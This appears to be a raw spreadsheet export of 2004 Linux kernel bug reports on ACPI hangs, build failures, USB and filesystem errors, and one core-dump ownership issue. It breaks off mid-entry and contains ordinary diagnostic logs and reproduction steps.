3Com Corporation 3c980-TX Fast Etherlink XL Server Adapter [Cyclone] (rev 78) 0000:00:10.0 Ethernet controller: 3Com Corporation 3c980-TX Fast Etherlink XL Server Adapter [Cyclone] (rev 78) 0000:01:05.0 VGA compatible controller: ATI Technologies Inc RV350 AP [Radeon 9600] 0000:01:05.1 Display controller: ATI Technologies Inc RV350 AP [Radeon 9600] (Secondary) Software Environment: ? Problem Description: Every time I shut down the system (having ACPI enabled) it hangs. The monitor goes to power saving mode, but the fans, etc. of the computer keep running. Using the power / reset buttons does not help. The system remains in this state until I pull the power plug. Exactly the same thing happens with rebooting the system. This did not happen with kernel 2.6.0. It seems to me somewhat ACPI related. Without any apci modules loaded there is no problem. Interestingly I can shut down the system from Windows 2000, but I cannot reboot it (same symptoms). Steps to reproduce: Boot system with ACPI modules loaded. shutdown -h now or shutdown -r now =&gt; System hangs.</t>
  </si>
  <si>
    <t>ASM Compile error</t>
  </si>
  <si>
    <t>2004-07-07 05:15 UTC</t>
  </si>
  <si>
    <t>richard</t>
  </si>
  <si>
    <t>2004-07-14 14:15 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat 9 Hardware Environment: athlon k7 Software Environment: gcc 3.2.1 Problem Description: after type "make" (with other kernel versions no problem) this failzre is coming CC arch/i386/kernel/asm-offsets.s In Datei, eingef?gt von include/asm/system.h:5, von include/asm/processor.h:18, von include/asm/thread_info.h:16, von include/linux/thread_info.h:21, von include/linux/spinlock.h:12, von include/linux/capability.h:45, von include/linux/sched.h:7, von arch/i386/kernel/asm-offsets.c:7: include/linux/kernel.h:10:20: stdarg.h: Datei oder Verzeichnis nicht gefunden In file included from include/asm/system.h:5, from include/asm/processor.h:18, from include/asm/thread_info.h:16, from include/linux/thread_info.h:21, from include/linux/spinlock.h:12, from include/linux/capability.h:45, from include/linux/sched.h:7, from arch/i386/kernel/asm-offsets.c:7: include/linux/kernel.h:71: Fehler: parse error vor "va_list" include/linux/kernel.h:71: Warnung: Funktionsdeklaration ist kein Prototyp include/linux/kernel.h:74: Fehler: parse error vor "va_list" include/linux/kernel.h:74: Warnung: Funktionsdeklaration ist kein Prototyp include/linux/kernel.h:77: Fehler: parse error vor "va_list" include/linux/kernel.h:77: Warnung: Funktionsdeklaration ist kein Prototyp include/linux/kernel.h:81: Fehler: parse error vor "va_list" include/linux/kernel.h:81: Warnung: Funktionsdeklaration ist kein Prototyp make[1]: *** [arch/i386/kernel/asm-offsets.s] Fehler 1 make: *** [arch/i386/kernel/asm-offsets.s] Fehler 2 Steps to reproduce: make</t>
  </si>
  <si>
    <t>Invalid events for USB mouse buttons clicks (BTC 8190URF)</t>
  </si>
  <si>
    <t>2.6.25</t>
  </si>
  <si>
    <t>2004-07-07 11:37 UTC</t>
  </si>
  <si>
    <t>Artur Frysiak</t>
  </si>
  <si>
    <t>2008-09-24 07:17 UTC</t>
  </si>
  <si>
    <t>Jiri Kosina</t>
  </si>
  <si>
    <t>Distribution: PLD Linux Problem Description: I have BTC wireless keyboard and mouse kit 8190URF connected to USB port. Mouse click generated invalid event: - left mouse button generates Event: time 1089224335.637981, type 1 (Key), code 287 (?), value 1 Event: time 1089224335.638057, -------------- Report Sync ------------ Event: time 1089224335.717963, type 1 (Key), code 287 (?), value 0 Event: time 1089224335.718016, -------------- Report Sync ------------ - middle(wheel) mouse button Event: time 1089224339.653249, type 1 (Key), code 289 (ThumbBtn), value 1 Event: time 1089224339.653291, -------------- Report Sync ------------ Event: time 1089224339.813219, type 1 (Key), code 289 (ThumbBtn), value 0 Event: time 1089224339.813265, -------------- Report Sync ------------ - right mouse button Event: time 1089224340.645062, type 1 (Key), code 288 (Trigger), value 1 Event: time 1089224340.645104, -------------- Report Sync ------------ Event: time 1089224340.765037, type 1 (Key), code 288 (Trigger), value 0 Event: time 1089224340.765087, -------------- Report Sync ------------ - mouse wheel rolling generates correct events Event: time 1089224347.283851, type 2 (Relative), code 8 (Wheel), value 1 Event: time 1089224347.283905, -------------- Report Sync ------------ Event: time 1089224348.571619, type 2 (Relative), code 8 (Wheel), value -1 Event: time 1089224348.571669, -------------- Report Sync ------------ - but second wheel (on keyboard) generates -- second wheel up Event: time 1089224694.789241, type 1 (Key), code 275 (SideBtn), value 1 Event: time 1089224694.789248, type 1 (Key), code 275 (SideBtn), value 0 Event: time 1089224694.789254, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224694.789258, type 2 (Relative), code 10 (?), value 115 Event: time 1089224694.789300, -------------- Report Sync ------------ Event: time 1089224694.813225, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224694.813242, type 2 (Relative), code 10 (?), value 115 Event: time 1089224694.813284, -------------- Report Sync ------------ -- second wheel down Event: time 1089224728.143270, type 1 (Key), code 276 (ExtraBtn), value 1 Event: time 1089224728.143283, type 1 (Key), code 276 (ExtraBtn), value 0 Event: time 1089224728.143292, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224728.143295, type 2 (Relative), code 10 (?), value 115 Event: time 1089224728.143344, -------------- Report Sync ------------ Event: time 1089224728.175206, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224728.175223, type 2 (Relative), code 10 (?), value 115 Event: time 1089224728.175257, -------------- Report Sync ------------ -- second wheel button Event: time 1089224770.055671, type 1 (Key), code 274 (MiddleBtn), value 1 Event: time 1089224770.055677, type 1 (Key), code 274 (MiddleBtn), value 0 Event: time 1089224770.055684, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224770.055687, type 2 (Relative), code 10 (?), value 115 Event: time 1089224770.055728, -------------- Report Sync ------------ Event: time 1089224770.103646, type 2 (Relative), code 9 (Misc), value 61 Event: time 1089224770.103656, type 2 (Relative), code 10 (?), value 115 Event: time 1089224770.103698, -------------- Report Sync ------------</t>
  </si>
  <si>
    <t>UDF and NLS codependency error in menuconfig</t>
  </si>
  <si>
    <t>2004-07-08 02:56 UTC</t>
  </si>
  <si>
    <t>David Wood</t>
  </si>
  <si>
    <t>2004-07-11 15:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: SCSI (Adaptec) Software Environment: GCC 3.3.4 (Debian 1:3.3.4-2) Problem Description: It's possible to set NLS as a module, without setting UDF as a module. If this is done, the kernel fails to link, due to the udf.o object requring information from the (missing, because its a module) nls.o object. Steps to reproduce: Pristine kernel tree: make menuconfig Filesystems / CD-ROM filesystems / UDF &lt;*&gt; Filesystems / NLS / NLS &lt;M&gt; make bzImage The build will fail at or near the final kernel link.</t>
  </si>
  <si>
    <t>IOAPIC interrupt lost after S3</t>
  </si>
  <si>
    <t>2004-07-09 01:20 UTC</t>
  </si>
  <si>
    <t>2004-10-17 20:15 UTC</t>
  </si>
  <si>
    <t>After resume from s3, all I/O APIC interrups lost. There is a track (Bug 2643) addressing similar issue, but it only handles PIC mode.</t>
  </si>
  <si>
    <t>issue with core dump owner</t>
  </si>
  <si>
    <t>2.6.x and 2.4.x</t>
  </si>
  <si>
    <t>2004-07-10 19:15 UTC</t>
  </si>
  <si>
    <t>blake frantz</t>
  </si>
  <si>
    <t>2010-08-16 07:46 UTC</t>
  </si>
  <si>
    <t>Ingo Molnar</t>
  </si>
  <si>
    <t>in 2.6.x and 2.4.x kernels, if a core file owned by a non root user exists and root runs a process that drops core in the same location, the original core file owned by the non root user is replaced with root's core dump, except the original owner maintains ownership of the core. obsd and fbsd operate in the same manner. i have not tested other platforms trew@uber:~/tmp/q$ ./t Segmentation fault (core dumped) trew@uber:~/tmp/q$ md5sum core 90b29a1012aa00c34a18947d98f1b1fb core trew@uber:~/tmp/q$ ls -l core -rw------- 1 trew users 61440 Jul 10 19:13 core trew@uber:~/tmp/q$ su Password: uber:/home/trew/tmp/q# ./t Segmentation fault (core dumped) uber:/home/trew/tmp/q# md5sum core 371c0748df009ed1da6f189cceff8aca core uber:/home/trew/tmp/q# ls -l core -rw------- 1 trew users 61440 Jul 10 19:13 core</t>
  </si>
  <si>
    <t>ACPI conflicts with i2c-viapro</t>
  </si>
  <si>
    <t>2.6.7-mm3</t>
  </si>
  <si>
    <t>2004-07-11 11:31 UTC</t>
  </si>
  <si>
    <t>Jean Delvare</t>
  </si>
  <si>
    <t>Distribution: Slackware GNU/Linux 9.1 Hardware Environment: AMD Athlon / Asus A7V133-C Problem Description: In 2.6.7-mm3, 2.6.7-mm5, 2.6.7-mm6 and 2.6.7-mm7, ACPI reserves an address range needed by i2c-viapro (SMBus driver). The problem doesn't show in 2.6.7-mm4 because it didn't include bk-acpi.patch. Steps to reproduce: modprobe i2c-dev modprobe i2c-viapro i2cdetect -l will not list the VIA SMBus adapter. Logs say: vt596 smbus 0000:00:04.4: SMBus region 0xe800 already in use! /proc/ioports has: e800-e80f : 0000:00:04.4 e800-e80f : motherboard Reverting bk-acpi.patch (tested on 2.6.7-mm6) solves the problem. SMBus is working, and /proc/ioports has: e800-e80f : 0000:00:04.4 e800-e807 : viapro-smbus</t>
  </si>
  <si>
    <t>2004-07-11 14:54 UTC</t>
  </si>
  <si>
    <t>2006-04-15 12:51 UTC</t>
  </si>
  <si>
    <t>na</t>
  </si>
  <si>
    <t>ehci "fatal error" at startup</t>
  </si>
  <si>
    <t>all kernels &gt; 2.6.6</t>
  </si>
  <si>
    <t>2004-07-12 10:10 UTC</t>
  </si>
  <si>
    <t>2005-01-15 02:38 UTC</t>
  </si>
  <si>
    <t>2897 4007</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Athlon Problem Description: errors in dmesg from ehci, and USB 2 HDD will not work. Steps to reproduce: Plug HDD into USB 2 port. ehci_hcd 0000:00:10.3: EHCI Host Controller ehci_hcd 0000:00:10.3: irq 10, pci mem d69fec00 ehci_hcd 0000:00:10.3: new USB bus registered, assigned bus number 3 ehci_hcd 0000:00:10.3: USB 2.0 enabled, EHCI 1.00, driver 2004-May-10 hub 3-0:1.0: USB hub found hub 3-0:1.0: 6 ports detected ehci_hcd 0000:00:10.3: fatal error ehci_hcd 0000:00:10.3: HC died; cleaning up process `named' is using obsolete setsockopt SO_BSDCOMPAT usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 usb usb3: string descriptor 0 read error: -19 The drive will detect/work properly with uhci. I tried this with 2.6.8-rc1, as well as 2.6.7-mm6 and 2.6.7-mm7 and have the exact same problem.</t>
  </si>
  <si>
    <t>2.6.8-rc2</t>
  </si>
  <si>
    <t>Request: Ability to flush in-memory caches/buffers</t>
  </si>
  <si>
    <t>2004-07-14 23:37 UTC</t>
  </si>
  <si>
    <t>Patrick Huber</t>
  </si>
  <si>
    <t>2006-08-04 05:18 UTC</t>
  </si>
  <si>
    <t>This is more a feature reguest than a bug report (feel free to flame me if this is the wrong place to post. Apologies in advance ;-) ). With swsusp working, I don't like waiting too long for the system to go down. So I'd like to tell the kernel to a) flush dirty caches/buffers b) throw all caches/buffers away So swsusp would only write 'real used' memory to disk. Having such a feature could speed up swsusp quite a bit since (I guess) most data buffered has already been written and is only buffered to speed up reads and most of that could be thrown away without having to write it to disk.</t>
  </si>
  <si>
    <t>ACPI-0443 *** Warning Inconsistent FADT length (0x84) and revision (0x3), using FADT V1.0 portion of table</t>
  </si>
  <si>
    <t>2004-07-17 14:03 UTC</t>
  </si>
  <si>
    <t>steven meadows</t>
  </si>
  <si>
    <t>2004-07-23 14:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: HP pavilion zt1135 laptop Software Environment: Linux 2.6.7 kernel Problem Description: ACPI-0443 *** Warning Inconsistent FADT length (0x84) and revision (0x3), using FADT V1.0 portion of table Steps to reproduce: Boot machine</t>
  </si>
  <si>
    <t>kernel BUG in call_console_drivers at kernel/printk.c:422</t>
  </si>
  <si>
    <t>2004-07-18 02:18 UTC</t>
  </si>
  <si>
    <t>2005-07-25 08:23 UTC</t>
  </si>
  <si>
    <t>Anton Blanchard</t>
  </si>
  <si>
    <t>Distribution:RedHat EL 3 Hardware Environment: IBM JS20 (blade with dual powerpc970) Software Environment: Problem Description: The 2.6-kernels fails to boot. It might just be a .config problem, but I'm lost as to what it might be as I've not yet gotten a 2.6 kernel to boot on this system. It fails with the message: &lt;snip&gt; 0000000000000000 : booting cpu /cpus/PowerPC,970@0 0000000000000001 : starting cpu /cpus/PowerPC,970@1... ... done Calling quiesce ... returning from prom_init kernel BUG in call_console_drivers at kernel/printk.c:422! Steps to reproduce: make defconfig ; make -j4 ; make modules_install ; make install ; reboot</t>
  </si>
  <si>
    <t>Bug in drivers/pcmcia/soc_common.c</t>
  </si>
  <si>
    <t>2.6.8-rc1-bk1</t>
  </si>
  <si>
    <t>2004-07-21 09:18 UTC</t>
  </si>
  <si>
    <t>marcus hall</t>
  </si>
  <si>
    <t>2004-08-17 02:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: There is a bug soc_common.c: soc_common_drv_pcmcia_probe(). The skt variable is allocated within the scope of a for() {}, and then later within a do {} while. BUT there are goto's from within the for() into the do-while. It turns out that the arm gcc allocates the two skt's different registers, so if one of the goto's is taken, the code faults. One solution is to declare skt at the top of the function and only set it in the two loops... Steps to reproduce:</t>
  </si>
  <si>
    <t>/proc/bus/usb/devices stall</t>
  </si>
  <si>
    <t>2004-07-22 03:23 UTC</t>
  </si>
  <si>
    <t>Tyler Nielsen</t>
  </si>
  <si>
    <t>2004-08-11 10:04 UTC</t>
  </si>
  <si>
    <t>baldrick</t>
  </si>
  <si>
    <t>Problem Description: We have a setup where we use libusb to control 32 units throughout a test process. Basically we detect when a board is plugged in and fork a process for it. Starting with 2.6.7, we have been having hang problems where the fork occurs and then the process goes into disk wait. Once the test completes on the units already running, then the processes in disk wait will continue. I'm betting it has to do with some of the serialize changes that went into 2.6.7. Steps to reproduce: Transfer data over several devices and then try to cat /proc/bus/usb/devices.</t>
  </si>
  <si>
    <t>reBoot and powerOff functions in SysRq does not work anymore</t>
  </si>
  <si>
    <t>2004-07-22 14:50 UTC</t>
  </si>
  <si>
    <t>2004-12-02 23:01 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: IBM Thinkpad T4x,T50p Problem Description: For some time now, the reBoot and powerOff functions in SysRq does not work anymore. There are times when powerOff works, but reBoot does not all the time. Steps to reproduce: Try the folowing: SysRq + b to reboot - it does not work any more. SysRq + o to poweroff - usualy nothing happens (sometimes it does and powers off)</t>
  </si>
  <si>
    <t>ens1371 doesn't survive ACPI S3 suspend/resume cycle</t>
  </si>
  <si>
    <t>2004-07-24 12:38 UTC</t>
  </si>
  <si>
    <t>Dimos Dimoulis</t>
  </si>
  <si>
    <t>2007-04-28 12:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: VIA KT400 Software Environment: patch 3263 from bug #2643 Problem Description: After applying the patch mentioned above, I can get sound working across S3 suspend/resume cycles, if I remove and reload the ALSA modules for ens1371. If I don't do this, the ens1371 driver stops working when the system gets out of sleep (the driver isn't suspend/resume aware) Steps to reproduce: put the system in S3 sleep, restore it play a sound</t>
  </si>
  <si>
    <t>eeh_register_disable_func missing</t>
  </si>
  <si>
    <t>2004-07-27 08:16 UTC</t>
  </si>
  <si>
    <t>2004-09-03 07:29 UTC</t>
  </si>
  <si>
    <t>Distribution: any Hardware Environment: Power4 Software Environment: gcc 3.3.3, kernel 2.6.8-rc2, CONFIG_HOTPLUG_PCI_RPA=y Problem Description: Build break, looks like eeh_register_disable_func disappeared from arch/ppc64/kernel/eeh.c. LD .tmp_vmlinux1 drivers/built-in.o(.init.text+0x958): In function `.rpaphp_init': : undefined reference to `.eeh_register_disable_func' drivers/built-in.o(.exit.text+0xf4): In function `.rpaphp_exit': : undefined reference to `.eeh_register_disable_func' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: build with CONFIG_HOTPLUG_PCI_RPA=y</t>
  </si>
  <si>
    <t>Can't read data from zip250 reiserfs partition</t>
  </si>
  <si>
    <t>2004-07-27 12:27 UTC</t>
  </si>
  <si>
    <t>William Harrington</t>
  </si>
  <si>
    <t>2004-08-05 19:32 UTC</t>
  </si>
  <si>
    <t>Distribution: My Own Hardware Environment: i686 pentium3 i386 Software Environment: GNU/linux Gnu C 3.4.1 Gnu make 3.80 binutils 2.15.91.0.1 util-linux 2.12a mount 2.12a module-init-tools 3.0 e2fsprogs 1.35 Linux C Library 2.3.4 Dynamic linker (ldd) 2.3.4 Linux C++ Library 6.0.1 Procps 3.2.1 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded Problem Description: Not able to read data from reiserfs partition on zip250 disk. Using imm driver in scsi low level drivers in the kernel. Steps to reproduce: Mount a zip250 with a reiserfs partition on it not created from the host machine. Try to cat, move, copy, or anything with the file and the kernel is not happy. Here's the information: SCSI device sdc: 489532 512-byte hdwr sectors (251 MB) sdc: Write Protect is off sdc: Mode Sense: 31 00 00 08 SCSI device sdc: drive cache: write back SCSI device sdc: 489532 512-byte hdwr sectors (251 MB) sdc: Write Protect is off sdc: Mode Sense: 31 00 00 08 SCSI device sdc: drive cache: write back sdc: sdc4 ReiserFS: sdc4: found reiserfs format "3.6" with standard journal ReiserFS: sdc4: using ordered data mode ReiserFS: sdc4: journal params: device sdc4, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 ReiserFS: sdc4: checking transaction log (sdc4) ReiserFS: sdc4: Using r5 hash to sort names Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c02bef2b *pde = 00000000 Oops: 0002 [#1] PREEMPT SMP Modules linked in: CPU: 1 EIP: 0060:[&lt;c02bef2b&gt;] Not tainted EFLAGS: 00010202 (2.6.7) EIP is at imm_byte_in+0x3b/0x60 eax: 000000d0 ebx: 00000200 ecx: 0000037a edx: 00000378 esi: 00000001 edi: 00000378 ebp: 00000000 esp: c2071e80 ds: 007b es: 007b ss: 0068 Process events/1 (pid: 7, threadinfo=c2071000 task=c20fcb70) Stack: f7fc4758 00000378 00000000 00000379 c02bf232 00000378 00000000 00000200 c2022be0 00000200 f528cb80 f7fc4758 00000379 c02bf6ef f7fc4758 00000000 00000200 0000037a 00000001 004b1b45 000007d0 00000006 f528cb80 f7fc4758 Call Trace: [&lt;c02bf232&gt;] imm_in+0x152/0x190 [&lt;c02bf6ef&gt;] imm_completion+0x1cf/0x220 [&lt;c02bfc93&gt;] imm_engine+0x403/0x480 [&lt;c02bf777&gt;] imm_interrupt+0x37/0x150 [&lt;c0130686&gt;] worker_thread+0x1f6/0x2d0 [&lt;c02bf740&gt;] imm_interrupt+0x0/0x150 [&lt;c011b130&gt;] default_wake_function+0x0/0x20 [&lt;c011b130&gt;] default_wake_function+0x0/0x20 [&lt;c0102185&gt;] kernel_thread_helper+0x5/0x10 Code: 88 45 00 89 ca b0 25 ee 4b 75 ea 8b 1c 24 b8 01 00 00 00 8b &lt;6&gt;parport0: imm already owner parport0: imm already owner scsi: Device offlined - not ready after error recovery: host 1 channel 0 id 6 lun 0 SCSI error : &lt;1 0 6 0&gt; return code = 0x70000 end_request: I/O error, dev sdc, sector 76560 scsi1 (6:0): rejecting I/O to offline device scsi1 (6:0): rejecting I/O to offline device Buffer I/O error on device sdc4, logical block 95 lost page write due to I/O error on sdc4 Buffer I/O error on device sdc4, logical block 96 REISERFS: panic (device sdc4): journal-601, buffer write failed ------------[ cut here ]------------ kernel BUG at fs/reiserfs/prints.c:362! invalid operand: 0000 [#2] PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[&lt;c01b95c2&gt;] Not tainted EFLAGS: 00010286 (2.6.7) lost page write due to I/O error on sdc4 EIP is at reiserfs_panic+0x52/0x80 eax: 00000044 ebx: c03ae800 ecx: c03eba14 edx: f7d13000 esi: f7cb4c00 edi: f7cb4d44 ebp: f7cb4c00 esp: f7d13df8 ds: 007b es: 007b ss: 0068 Process pdflush (pid: 13, threadinfo=f7d13000 task=f7ceb6d0) Stack: c03b3220 f7cb4d44 c04ceaa0 f3b58000 f7f9ad58 00000000 c01c6b83 f7cb4c00 c03b42f4 00001000 fabe6070 f3b58000 00000001 f7f9ad70 f58bc83c f7cb4c00 f7f9ad58 00000000 f7f9ad58 c01cbd98 f7cb4c00 f7f9ad58 00000001 00000006 Call Trace: [&lt;c01c6b83&gt;] flush_commit_list+0x443/0x470 [&lt;c01cbd98&gt;] do_journal_end+0xb18/0xb99 [&lt;c01ca718&gt;] journal_end_sync+0x48/0xb0 [&lt;c01b5a09&gt;] reiserfs_sync_fs+0x79/0xe0 [&lt;c0168d1d&gt;] put_super+0x2d/0x70 [&lt;c0169490&gt;] sync_supers+0x120/0x130 [&lt;c0145415&gt;] wb_kupdate+0x35/0x130 [&lt;c0394c6b&gt;] schedule+0x1cb/0x670 [&lt;c014612b&gt;] __pdflush+0x10b/0x240 [&lt;c0146260&gt;] pdflush+0x0/0x30 [&lt;c0146286&gt;] pdflush+0x26/0x30 [&lt;c01453e0&gt;] wb_kupdate+0x0/0x130 [&lt;c0146260&gt;] pdflush+0x0/0x30 [&lt;c013478c&gt;] kthread+0xbc/0x100 [&lt;c01346d0&gt;] kthread+0x0/0x100 [&lt;c0102185&gt;] kernel_thread_helper+0x5/0x10 Code: 0f 0b 6a 01 cb ec 3a c0 c7 04 24 44 32 3b c0 85 f6 be a0 ea &lt;3&gt;scsi1 (6:0): rejecting I/O to offline device Buffer I/O error on device sdc4, logical block 9566 [&lt;c0130490&gt;] worker_thread+0x0/0x2d0 [&lt;c013478c&gt;] kthread+0xbc/0x100 [&lt;c01346d0&gt;] kthread+0x0/0x100 Here is what I have done to confirm my hardware is ok. I installed slackware 8.1 using the 2.4.18 kernel and it read the data from the zip250 disk I'm having problems with on 2.6.7. I have another zip250 disk I deleted the partitions, cleared the disk, and then made a partition on it and a formatted it with reiserfs with the 2.6.7 machine. I was able to mount and copy and read files to the partition. I took that same disk I made with the 2.6.7 machine and took it to the 2.4.18 machine and it could read and write files to it. With the 2.4.18 machine, I copied the files I needed from the zip250 disk I'm having problems with and then copied the files to the zip250 disk made on the 2.6.7 machine. I took that disk back to the 2.6.7 machine, mounted it and tried to copy a file from it and the kernel gave messages. My problem, I can't share zipdisks between older kernels and 2.6.7 I do not know if it affects kernels in the 2.6 before 2.6.7. Somehow, writing from the 2.4.18 kernel messed it up enough that the 2.6.7 kernel has problems reading the data. I can get directory listings no problem in the 2.6.7 kernel. 2.6.7 can work with its own but not with the 2.4.18-22 (havne't confirmed with 23-26) 2.4.18 can work with it's own and other kernels The original zip250 disk I'm having problems with was created on a 2.4.22 machine.</t>
  </si>
  <si>
    <t>Journal is aborted and filesystems made read-only.</t>
  </si>
  <si>
    <t>2004-07-30 12:37 UTC</t>
  </si>
  <si>
    <t>Leandro GFC Dutra</t>
  </si>
  <si>
    <t>2006-02-25 03:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Pentium IV Software Environment: software RAID5, LVM2 Problem Description: After a few days of activity, the journal is aborted. The filesystem is made read-only, and the only way out is rebooting. Steps to reproduce: Just keep the system running [2.] Full description of the problem/report: One can't anymore write to the affected file systems. Upon investigation, ext3fs journal was aborted and affected filesystems are remounted read-only. Reboot prompts for fsck to be run manually, with fixes taking several prompts and minutes. [3.] Keywords (i.e., modules, networking, kernel): File systems, I/O, RAID, LVM, kernel. [4.] Kernel version (from /proc/version): Couldn't find /proc/version, uname -a gives: Linux mercurio 2.6.2-1-686-smp #1 SMP Sat Feb 7 15:27:45 EST 2004 i686 GNU/Linux [5.] Output of Oops.. message (if applicable) with symbolic information resolved (see Documentation/oops-tracing.txt) N/A [6.] A small shell script or example program which triggers the problem (if possible) N/A [7.] Environment [7.1.] Software (add the output of the ver_linux script here) [7.2.] Processor information (from /proc/cpuinfo): processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.40GHz stepping : 9 cpu MHz : 2394.494 cache size : 512 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 4718.59 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.40GHz stepping : 9 cpu MHz : 2394.494 cache size : 512 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 4784.12 [7.3.] Module information (from /proc/modules): ipv6 273856 25 - Live 0xf8d4e000 i810_audio 35476 0 - Live 0xf8cc9000 ac97_codec 19340 1 i810_audio, Live 0xf8cc3000 ide_scsi 15716 0 - Live 0xf8bf1000 parport_pc 37228 1 - Live 0xf8cf4000 lp 11844 0 - Live 0xf8ca9000 parport 45608 2 parport_pc,lp, Live 0xf8ce7000 ext2 75528 3 - Live 0xf8cd3000 dm_mod 42304 8 - Live 0xf8c66000 raid5 23392 1 - Live 0xf8c06000 xor 15848 1 raid5, Live 0xf8b40000 md 48680 2 raid5, Live 0xf8caf000 i810fb 33088 0 - Live 0xf8bfc000 vgastate 10272 1 i810fb, Live 0xf8b91000 e100 65448 0 - Live 0xf8c55000 ntfs 92044 0 - Live 0xf8c3d000 cifs 178380 0 - Live 0xf8c72000 autofs4 17344 0 - Live 0xf8bdc000 smbfs 70424 0 - Live 0xf8c2a000 udf 105188 0 - Live 0xf8c0f000 vfat 16512 0 - Live 0xf8bd6000 msdos 11424 0 - Live 0xf8b8d000 fat 48064 2 vfat,msdos, Live 0xf8be4000 aes 32704 0 - Live 0xf8ba2000 md5 4096 1 - Live 0xf8932000 quota_v2 9536 0 - Live 0xf8b80000 binfmt_misc 11400 0 - Live 0xf8b7c000 microcode 8160 0 - Live 0xf8b4d000 snd_intel8x0 33220 0 - Live 0xf8b98000 snd_ac97_codec 55556 1 snd_intel8x0, Live 0xf8bc7000 snd_pcm 104640 1 snd_intel8x0, Live 0xf8bac000 snd_timer 26788 1 snd_pcm, Live 0xf8b85000 snd_page_alloc 12100 2 snd_intel8x0,snd_pcm, Live 0xf8b16000 snd_mpu401_uart 8352 1 snd_intel8x0, Live 0xf8b3c000 snd_rawmidi 25536 1 snd_mpu401_uart, Live 0xf8b45000 snd_seq_device 8296 1 snd_rawmidi, Live 0xf8b38000 snd 55012 7 snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device, Live 0xf8b6d000 soundcore 10752 2 i810_audio,snd, Live 0xf8b0e000 firmware_class 9440 0 - Live 0xf8b12000 cpufreq_powersave 1824 0 - Live 0xf8959000 usbkbd 7552 0 - Live 0xf89ed000 usbmouse 5792 0 - Live 0xf8b0b000 hid 33792 0 - Live 0xf8b2e000 usbcore 114652 4 usbkbd,usbmouse,hid, Live 0xf8b50000 i2c_i810 4740 0 - Live 0xf8b02000 i2c_algo_bit 10024 1 i2c_i810, Live 0xf8b07000 i2c_core 23844 1 i2c_algo_bit, Live 0xf8af4000 i830 75756 2 - Live 0xf8b1a000 raw 8192 0 - Live 0xf89d9000 pcspkr 3724 0 - Live 0xf8952000 psmouse 20264 0 - Live 0xf8afc000 pcips2 4352 0 - Live 0xf89d6000 analog 11776 0 - Live 0xf8af0000 gameport 5120 1 analog, Live 0xf89cd000 intel_agp 18684 1 - Live 0xf89d0000 nls_cp850 4960 0 - Live 0xf89a6000 nls_cp437 5792 0 - Live 0xf89a3000 nls_iso8859_1 4128 0 - Live 0xf89a0000 nls_iso8859_15 4704 0 - Live 0xf899d000 nls_utf8 2144 0 - Live 0xf8950000 nfs 169244 2 - Live 0xf8a14000 nfsd 181600 0 - Live 0xf8a41000 exportfs 7328 1 nfsd, Live 0xf8927000 lockd 64168 3 nfs,nfsd, Live 0xf89dc000 sunrpc 140328 9 nfs,nfsd,lockd, Live 0xf89f0000 coda 42660 0 - Live 0xf89bc000 mousedev 10264 1 - Live 0xf8955000 nbd 21256 0 - Live 0xf8996000 loop 18504 0 - Live 0xf8965000 floppy 62516 0 - Live 0xf89ab000 agpgart 33132 3 intel_agp, Live 0xf895b000 fan 4140 0 - Live 0xf892a000 thermal 13360 0 - Live 0xf894b000 processor 14608 1 thermal, Live 0xf892d000 ide_detect 1312 0 - Live 0xf8825000 ide_cd 42404 0 - Live 0xf893f000 ide_core 163600 3 ide_scsi,ide_detect,ide_cd, Live 0xf896d000 cdrom 39168 1 ide_cd, Live 0xf8934000 rtc 14120 0 - Live 0xf882b000 ext3 123880 7 - Live 0xf8844000 jbd 70424 1 ext3, Live 0xf8899000 mbcache 10212 2 ext2,ext3, Live 0xf8830000 sd_mod 17024 10 - Live 0xf883e000 BusLogic 82620 7 - Live 0xf8883000 scsi_mod 120208 3 ide_scsi,sd_mod,BusLogic, Live 0xf8864000 unix 31216 543 - Live 0xf8835000 font 8544 0 - Live 0xf8827000 cfbcopyarea 4192 1 i810fb, Live 0xf8820000 cfbimgblt 3360 1 i810fb, Live 0xf881e000 cfbfillrect 4096 1 i810fb, Live 0xf881c000 [7.4.] Loaded driver and hardware information (/proc/ioports, 